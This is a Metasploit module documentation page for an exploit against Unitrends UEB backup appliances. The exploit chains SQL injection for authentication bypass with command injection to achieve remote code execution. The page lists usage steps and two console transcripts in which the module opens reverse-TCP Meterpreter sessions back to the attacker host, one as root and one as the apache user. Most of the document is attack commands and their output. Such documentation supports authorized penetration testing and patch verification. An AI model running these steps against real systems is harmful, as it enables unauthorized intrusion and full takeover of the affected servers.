## Vulnerable Application

This exploit leverages an SQL injection (SQLi) vulnerability for authentication bypass, together with a command injection for subsequent RCE. The module has two targets:

1. Unitrends UEB 9: HTTP `api/storage` RCE, yielding root privileges
2. Unitrends UEB < 10.1.0: `api/hosts` RCE, yielding user (apache) privileges

## Verification Steps

1. ```use exploit/linux/http/ueb_api_rce```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```set target [#]```
5. ```exploit```
6. A meterpreter session should have been opened successfully

## Scenarios

### UEB 9.2 on CentOS 6.5

Using api/storage (target 0), the root exploit:

```
msf5 > use exploit/linux/http/ueb_api_rce
msf5 exploit(linux/http/ueb_api_rce) > set target 0
target => 0
msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf5 exploit(linux/http/ueb_api_rce) > exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress - 19.76% done (164/830 bytes)
[*] Command Stager progress - 39.16% done (325/830 bytes)
[*] Command Stager progress - 56.87% done (472/830 bytes)
[*] Command Stager progress - 74.82% done (621/830 bytes)
[*] Command Stager progress - 92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Command Stager progress - 126.63% done (1051/830 bytes)
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400
meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

### UEB 9.2 on CentOS 6.5

Using api/hosts (target 1), the apache-user exploit:

```
msf5 > use exploit/linux/http/ueb_api_rce
msf5 exploit(linux/http/ueb_api_rce) > set target 1
target => 1
msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf5 exploit(linux/http/ueb_api_rce) > exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress - 19.76% done (164/830 bytes)
[*] Command Stager progress - 39.16% done (325/830 bytes)
[*] Command Stager progress - 56.87% done (472/830 bytes)
[*] Command Stager progress - 74.82% done (621/830 bytes)
[*] Command Stager progress - 92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (861480 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400
[*] Command Stager progress - 126.63% done (1051/830 bytes)
meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > shell
Process 25534 created.
Channel 1 created.
whoami
apache
```